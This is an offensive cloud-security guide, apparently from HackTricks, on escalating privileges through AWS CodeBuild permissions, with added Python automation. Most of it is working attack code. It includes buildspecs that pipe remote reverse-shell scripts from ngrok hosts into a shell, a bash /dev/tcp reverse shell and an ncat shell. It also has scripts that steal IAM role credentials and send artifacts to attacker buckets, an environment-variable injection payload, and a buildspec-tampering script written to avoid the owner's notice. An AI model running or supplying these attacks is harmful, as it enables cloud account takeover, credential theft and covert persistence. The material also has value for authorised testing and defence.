AWS - Codebuild Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

codebuild

For more information check:

AWS - Codebuild Enum

codebuild:StartBuild | codebuild:StartBuildBatch

Having just one of these permissions is enough to start a build with a new buildspec and steal the token of the IAM role attached to the project:

```bash
cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
  build:
    commands:
      - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

# file:// makes the CLI send the file contents as the inline buildspec override
aws codebuild start-build --project-name <project-name> --buildspec-override file:///tmp/buildspec.yml
```

Note: the difference between the two commands is that:

  • StartBuild runs a single build job using a specific buildspec.yml.
  • StartBuildBatch lets you start a batch of builds with more complex configurations (e.g. running several builds in parallel).

Potential impact: Direct privesc to the attached AWS CodeBuild role.
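The following is an added example and not code from the original page: it drives the same technique with boto3 instead of the CLI. It starts one build of an existing project with a buildspec override that prints the role credentials between two markers, waits for the build, reads its CloudWatch log stream (this extra step needs logs:GetLogEvents on the project's log group) and pulls the credential JSON out of the log. The project name, the marker strings and the sample log lines are constructed for the example; the credential endpoint and the variable name are the ones described on this page.

```python
import json
import re
import time

# Constructed marker strings; any unique tokens would do.
START_MARK = "CREDS_START"
END_MARK = "CREDS_END"

# Buildspec override: read the role credentials from the container credential
# endpoint (169.254.170.2 + AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) and print
# them between the markers so they are easy to find in the build log.
EXFIL_BUILDSPEC = f"""version: 0.2
phases:
  build:
    commands:
      - echo {START_MARK}
      - curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
      - echo {END_MARK}
"""


def start_build_with_override(codebuild, project_name, buildspec=EXFIL_BUILDSPEC):
    """Needs only codebuild:StartBuild; the build keeps the project's service role."""
    resp = codebuild.start_build(projectName=project_name, buildspecOverride=buildspec)
    return resp["build"]["id"]


def wait_for_build(codebuild, build_id, poll=5, timeout=900):
    """Poll batch_get_builds until the build leaves IN_PROGRESS."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        build = codebuild.batch_get_builds(ids=[build_id])["builds"][0]
        if build["buildStatus"] != "IN_PROGRESS":
            return build
        time.sleep(poll)
    raise TimeoutError(f"build {build_id} still running after {timeout}s")


def fetch_log_lines(logs, build):
    """Read the build's whole CloudWatch log stream (needs logs:GetLogEvents)."""
    group, stream = build["logs"]["groupName"], build["logs"]["streamName"]
    lines, token = [], None
    while True:
        kwargs = {"logGroupName": group, "logStreamName": stream, "startFromHead": True}
        if token:
            kwargs["nextToken"] = token
        page = logs.get_log_events(**kwargs)
        lines.extend(e["message"] for e in page["events"])
        if page["nextForwardToken"] == token:  # same token back means no more events
            return lines
        token = page["nextForwardToken"]


def extract_credentials(log_lines):
    """Return the credential JSON printed between the markers, or None.
    CodeBuild also logs every command it runs, so the first START marker is the
    "Running command echo CREDS_START" line; the region up to the first END marker
    then holds our output plus CodeBuild's own prefixed lines, which have no braces."""
    text = "\n".join(log_lines)
    region = re.search(re.escape(START_MARK) + r"(.*?)" + re.escape(END_MARK), text, re.S)
    blob = region and re.search(r"\{.*\}", region.group(1), re.S)
    if not blob:
        return None
    try:
        creds = json.loads(blob.group(0))
    except json.JSONDecodeError:
        return None
    return creds if "AccessKeyId" in creds else None


def to_env_exports(creds):
    """Shell lines that make the stolen role usable with the AWS CLI."""
    return "\n".join([f"export AWS_ACCESS_KEY_ID={creds['AccessKeyId']}",
                      f"export AWS_SECRET_ACCESS_KEY={creds['SecretAccessKey']}",
                      f"export AWS_SESSION_TOKEN={creds['Token']}"])


# Constructed sample of what the log stream looks like after such a build.
SAMPLE_LOG = [
    "[Container] 2024/05/01 10:00:00.000000 Running command echo CREDS_START",
    "CREDS_START",
    '[Container] 2024/05/01 10:00:00.100000 Running command curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"',
    '{"RoleArn":"arn:aws:iam::123456789012:role/example-codebuild-role","AccessKeyId":"ASIAEXAMPLE",'
    '"SecretAccessKey":"secretEXAMPLE","Token":"tokenEXAMPLE","Expiration":"2024-05-01T11:00:00Z"}',
    "[Container] 2024/05/01 10:00:00.200000 Running command echo CREDS_END",
    "CREDS_END",
]

if __name__ == "__main__":
    import sys
    import boto3  # live run only
    project = sys.argv[1] if len(sys.argv) > 1 else "example-project"  # constructed default
    codebuild, logs = boto3.client("codebuild"), boto3.client("logs")
    build = wait_for_build(codebuild, start_build_with_override(codebuild, project))
    creds = extract_credentials(fetch_log_lines(logs, build))
    print(to_env_exports(creds) if creds else "no credentials found in the build log")
```

The parsing works on the raw log lines rather than on the console, so the same `extract_credentials` helper serves the buildspec variants later on this page that `curl` the credential endpoint; without log-read permission you would fall back to a reverse shell or an out-of-band exfiltration instead.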

StartBuild environment variable override

Even if you cannot modify the project (UpdateProject) and cannot override the buildspec, codebuild:StartBuild still lets you override environment variables at build time via:

  • CLI: --environment-variables-override
  • API: environmentVariablesOverride

If the build uses environment variables to control its behaviour (destination buckets, feature flags, proxy settings, logging, etc.), this can be enough to exfiltrate secrets the build role can reach or to get code execution inside the build.

Example 1: Redirect the artifact/upload destination to exfiltrate secrets

If the build publishes an artifact to a bucket/path controlled by an environment variable (for example UPLOAD_BUCKET), override it to an attacker-controlled bucket:

```bash
export PROJECT="<project-name>"
export EXFIL_BUCKET="<attacker-controlled-bucket>"

export BUILD_ID=$(aws codebuild start-build \
  --project-name "$PROJECT" \
  --environment-variables-override name=UPLOAD_BUCKET,value="$EXFIL_BUCKET",type=PLAINTEXT \
  --query build.id --output text)

# Wait for completion
while true; do
  STATUS=$(aws codebuild batch-get-builds --ids "$BUILD_ID" --query 'builds[0].buildStatus' --output text)
  [ "$STATUS" = "SUCCEEDED" ] && break
  case "$STATUS" in
    FAILED|FAULT|STOPPED|TIMED_OUT) echo "build ended with status $STATUS"; exit 1 ;;
  esac
  sleep 5
done

# Example expected location (depends on the buildspec/project logic):
aws s3 cp "s3://$EXFIL_BUCKET/uploads/$BUILD_ID/flag.txt" -
```

Example 2: Python startup injection via PYTHONWARNINGS + BROWSER

If the build runs python3 (common in buildspecs), you can sometimes get code execution without touching the buildspec by abusing:

  • PYTHONWARNINGS: Python resolves the category field of each warning filter by importing dotted paths. Setting it to ...:antigravity.x:... forces an import of the stdlib module antigravity (the import happens before the non-existent class name x is rejected; the "Invalid -W option ignored" message only goes to stderr afterwards).
  • antigravity: on import it calls webbrowser.open(...).
  • BROWSER: controls what webbrowser executes. On Linux it is split on `:`, which is why the payload below cannot contain a literal colon and rebuilds the `http://` prefix with the printf octal escape `\072` at run time. webbrowser also substitutes every `%s` in the command line with the URL it opens, so the trailing `#%s` absorbs that substitution and the script body itself must not contain any other `%s`.

This can be used to print the CodeBuild role credentials (from http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) into CloudWatch logs and recover them afterwards if you have permission to read the logs.

StartBuild JSON request for the PYTHONWARNINGS + BROWSER trick:

```json
{
  "projectName": "codebuild_lab_7_project",
  "environmentVariablesOverride": [
    {
      "name": "PYTHONWARNINGS",
      "value": "all:0:antigravity.x:0:0",
      "type": "PLAINTEXT"
    },
    {
      "name": "BROWSER",
      "value": "/bin/sh -c 'echo CREDS_START; URL=$(printf \"http\\\\072//169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\"); curl -s \"$URL\"; echo CREDS_END' #%s",
      "type": "PLAINTEXT"
    }
  ]
}
```
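The same primitive reproduced locally, as an added example that is not part of the original page: it runs the interpreter executing the script itself with the two variables set, so the import chain can be checked without a CodeBuild project. The credential endpoint is not contacted; a constructed AWS_CONTAINER_CREDENTIALS_RELATIVE_URI value is set and the command only prints the URL it would fetch with curl. Everything else (the PYTHONWARNINGS value, the shape of BROWSER with the `\072` colon and the trailing `#%s`) follows the request above.

```python
import os
import subprocess
import sys

# Category "antigravity.x": warnings._getcategory() runs __import__("antigravity")
# before it notices that attribute "x" does not exist, and importing antigravity
# calls webbrowser.open(...). "Invalid -W option ignored" lands on stderr afterwards.
PYTHONWARNINGS_PAYLOAD = "all:0:antigravity.x:0:0"

# webbrowser splits BROWSER on os.pathsep (":" on Linux), so the value cannot hold
# a literal colon; printf's octal escape \072 rebuilds "http://" at run time.
# webbrowser also replaces every "%s" in the command line with the URL it opens,
# so the trailing "#%s" absorbs that substitution and the script body itself
# must not contain another "%s".
BROWSER_PAYLOAD = (
    "/bin/sh -c '"
    "echo CREDS_START; "
    'URL=$(printf "http\\072//169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"); '
    'echo "$URL"; '  # in the real payload: curl -s "$URL"
    "echo CREDS_END' #%s"
)

# Constructed stand-in for the value CodeBuild injects into the build container.
FAKE_RELATIVE_URI = "/v2/credentials/constructed-example"


def run_python_with_payload(python=sys.executable):
    """Run `python -c pass` with the two variables set and return its stdout.
    No user code executes: the import chain fires while the interpreter processes
    sys.warnoptions (PYTHONWARNINGS) at startup, which is why a buildspec that
    merely invokes python3 is enough."""
    env = dict(os.environ)
    env.update({
        "PYTHONWARNINGS": PYTHONWARNINGS_PAYLOAD,
        "BROWSER": BROWSER_PAYLOAD,
        "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI": FAKE_RELATIVE_URI,
    })
    proc = subprocess.run([python, "-c", "pass"], env=env,
                          capture_output=True, text=True, timeout=60)
    return proc.stdout


def payload_fired(stdout):
    """True when the command ran and rebuilt the credential URL correctly."""
    lines = [line.strip() for line in stdout.splitlines()]
    return ("CREDS_START" in lines and "CREDS_END" in lines
            and f"http://169.254.170.2{FAKE_RELATIVE_URI}" in lines)


if __name__ == "__main__":
    out = run_python_with_payload()
    print(out)
    print("payload fired:", payload_fired(out))
```

If `payload_fired` returns False on a given Python build, check stderr: a `-W` parsing error that appears before any import means that interpreter rejects the category string before resolving it, and the trick does not apply there.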

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

An attacker with the iam:PassRole, codebuild:CreateProject, and codebuild:StartBuild or codebuild:StartBuildBatch permissions could escalate privileges to any IAM role that CodeBuild can assume by creating and running a project like this one.

```bash
# Option 1: dump the env and fetch the role credentials from the container credential endpoint
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Option 2: reverse shell (pick one; this line overrides option 1 if both are kept)
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
  \"name\": \"codebuild-demo-project\",
  \"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
  },
  \"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
  },
  \"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"aws/codebuild/standard:1.0\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\"
  },
  \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

REV_PATH="/tmp/rev.json"

# printf turns the \\n sequences above into the \n escapes the JSON string needs
printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project
```

Potential impact: Direct privesc to any AWS CodeBuild role.

Warning

Inside the CodeBuild container, the file /codebuild/output/tmp/env.sh contains all the env vars needed to reach the metadata credentials.

This file contains the env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, which holds the URL path used to access the credentials. It will look something like /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Append it to the URL http://169.254.170.2/ and you will be able to dump the role credentials.

In addition, it also contains the env variable ECS_CONTAINER_METADATA_URI, which holds the full URL for getting metadata info about the container.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

As in the previous section, if instead of creating a build project you can modify one, you can set the IAM role and steal its token

```bash
REV_PATH="/tmp/codebuild_pwn.json"

# Option 1: dump the env and fetch the role credentials from the container credential endpoint
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Option 2: reverse shell (pick one; this line overrides option 1 if both are kept)
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
  \"name\": \"<codebuild-demo-project>\",
  \"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
  },
  \"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
  },
  \"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"aws/codebuild/standard:1.0\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\"
  },
  \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name <codebuild-demo-project>
```

Potential impact: Direct privesc to any AWS CodeBuild role.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Like the previous section, but without the iam:PassRole permission: you can abuse these permissions to modify existing CodeBuild projects and access the role already attached to them (the JSON below deliberately omits serviceRole, since changing it would require PassRole).

```bash
REV_PATH="/tmp/codebuild_pwn.json"

# Option 1: dump the env and fetch the role credentials from the container credential endpoint
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Option 2: reverse shell (pick one; this line overrides option 1 if both are kept)
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
  \"name\": \"<codebuild-demo-project>\",
  \"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
  },
  \"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
  },
  \"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\",
    \"imagePullCredentialsType\": \"CODEBUILD\"
  }
}"

# Note: an image from the AWS public ECR is used instead of one from Docker Hub, because Docker Hub rate-limits CodeBuild pulls!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name <codebuild-demo-project>
```

Potential impact: Direct privesc to the attached AWS CodeBuild roles.

SSM

If you have enough permissions to start an ssm session, it is possible to get inside a CodeBuild project while it is being built.

The CodeBuild project needs to have a breakpoint, and the build has to be started with the debug session enabled (`--debug-session-enabled` on start-build); batch-get-builds then exposes the session target under `debugSession.sessionTarget`:

```yaml
phases:
  pre_build:
    commands:
      - echo Entered the pre_build phase...
      - echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint
```

Then:

```bash
aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>
```

For more info check the documentation.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

An attacker who can start/restart a build of a specific CodeBuild project that keeps its buildspec.yml file in an S3 bucket the attacker has write access to can get command execution inside the CodeBuild process.

Note: the escalation is only relevant if the CodeBuild worker runs with a different, preferably more privileged, role than the one the attacker already has.

```bash
aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_build > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)
```

You can use a buildspec like this one to get a reverse shell:

```yaml
version: 0.2

phases:
  build:
    commands:
      - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
```

Impact: Direct privesc to the role used by the AWS CodeBuild worker, which usually has high privileges.

Warning

Bear in mind that the buildspec may be expected in zip format, in which case the attacker would have to download the archive, unzip it, modify the buildspec.yml in its root directory, re-zip it and upload it again.
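The edit step of this procedure in Python, as an added example that is not code from the original page: it handles both the bare buildspec.yml object and the zipped-source case the warning above describes, inserting the command as the first entry of phases.pre_build.commands while leaving the rest of the file untouched. The sample buildspec and the sample zip are constructed for the example; the S3 download/upload in the `__main__` part uses boto3 with bucket and key names taken from the command line.

```python
import io
import re
import zipfile


def _indent(line):
    return len(line) - len(line.lstrip(" "))


def _find_key(lines, key, start, parent_indent):
    """Index of the `key:` line inside the mapping whose key sits at parent_indent,
    scanning from `start`; None once a line at or above parent_indent ends it."""
    pat = re.compile(rf"{re.escape(key)}:\s*(#.*)?")
    for i in range(start, len(lines)):
        stripped = lines[i].strip()
        if not stripped or stripped.startswith("#"):
            continue
        if _indent(lines[i]) <= parent_indent:
            return None
        if pat.fullmatch(stripped):
            return i
    return None


def inject_command(buildspec_text, command, phase="pre_build"):
    """Insert `command` as the first entry of phases.<phase>.commands, creating the
    phase or the list when missing. Edits the text directly, so everything else in
    the file keeps its exact formatting and no YAML library is needed."""
    lines = buildspec_text.splitlines()
    phases = _find_key(lines, "phases", 0, -1)
    if phases is None:
        lines += ["phases:", f"  {phase}:", "    commands:", f"      - {command}"]
        return "\n".join(lines) + "\n"
    ph = _find_key(lines, phase, phases + 1, _indent(lines[phases]))
    if ph is None:
        base = " " * (_indent(lines[phases]) + 2)
        lines[phases + 1:phases + 1] = [f"{base}{phase}:", f"{base}  commands:", f"{base}    - {command}"]
        return "\n".join(lines) + "\n"
    cm = _find_key(lines, "commands", ph + 1, _indent(lines[ph]))
    if cm is None:
        base = " " * (_indent(lines[ph]) + 2)
        lines[ph + 1:ph + 1] = [f"{base}commands:", f"{base}  - {command}"]
        return "\n".join(lines) + "\n"
    # Copy the indentation of the existing first item when there is one
    # (YAML allows "- item" at the same indent as "commands:" or deeper).
    nxt = next((l for l in lines[cm + 1:] if l.strip()), "")
    item = _indent(nxt) if nxt.lstrip().startswith("- ") else _indent(lines[cm]) + 2
    lines.insert(cm + 1, f"{' ' * item}- {command}")
    return "\n".join(lines) + "\n"


def patch_buildspec_object(body, command, phase="pre_build", name="buildspec.yml"):
    """Patch an S3 object body that is either a bare buildspec or a zipped source
    bundle with buildspec.yml at its root; other zip members are copied as-is."""
    if not body.startswith(b"PK\x03\x04"):
        return inject_command(body.decode(), command, phase).encode()
    out, found = io.BytesIO(), False
    with zipfile.ZipFile(io.BytesIO(body)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == name:
                data, found = inject_command(data.decode(), command, phase).encode(), True
            dst.writestr(info, data)
    if not found:
        raise FileNotFoundError(f"{name} is not at the root of the zip")
    return out.getvalue()


def read_zip_member(body, name):
    with zipfile.ZipFile(io.BytesIO(body)) as z:
        return z.read(name).decode()


# Constructed sample buildspec and zipped bundle (shaped like CodeBuild's own examples).
SAMPLE_BUILDSPEC = """version: 0.2
phases:
  install:
    runtime-versions:
      python: 3.11
  pre_build:
    commands:
      - echo Entered the pre_build phase...
  build:
    commands:
      - make
artifacts:
  files:
    - '**/*'
"""
INJECTED = "curl -s http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"


def make_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("buildspec.yml", SAMPLE_BUILDSPEC)
        z.writestr("src/main.py", "print('hello')\n")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    import boto3  # live run only; replaces the two `aws s3 cp` commands above
    bucket, key = sys.argv[1], sys.argv[2]
    s3 = boto3.client("s3")
    body = s3.get_object(Bucket=bucket, Key=key)["Body"].read()
    s3.put_object(Bucket=bucket, Key=key, Body=patch_buildspec_object(body, INJECTED))
```

The text-based edit deliberately avoids a YAML round trip: re-serialising the file would reorder keys and change quoting, which is the kind of diff a pipeline owner notices. It does not handle inline lists such as `commands: []`; for those, replace the whole buildspec as the previous example does.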

More details can be found here.

Potential impact: Direct privesc to the attached AWS CodeBuild roles.
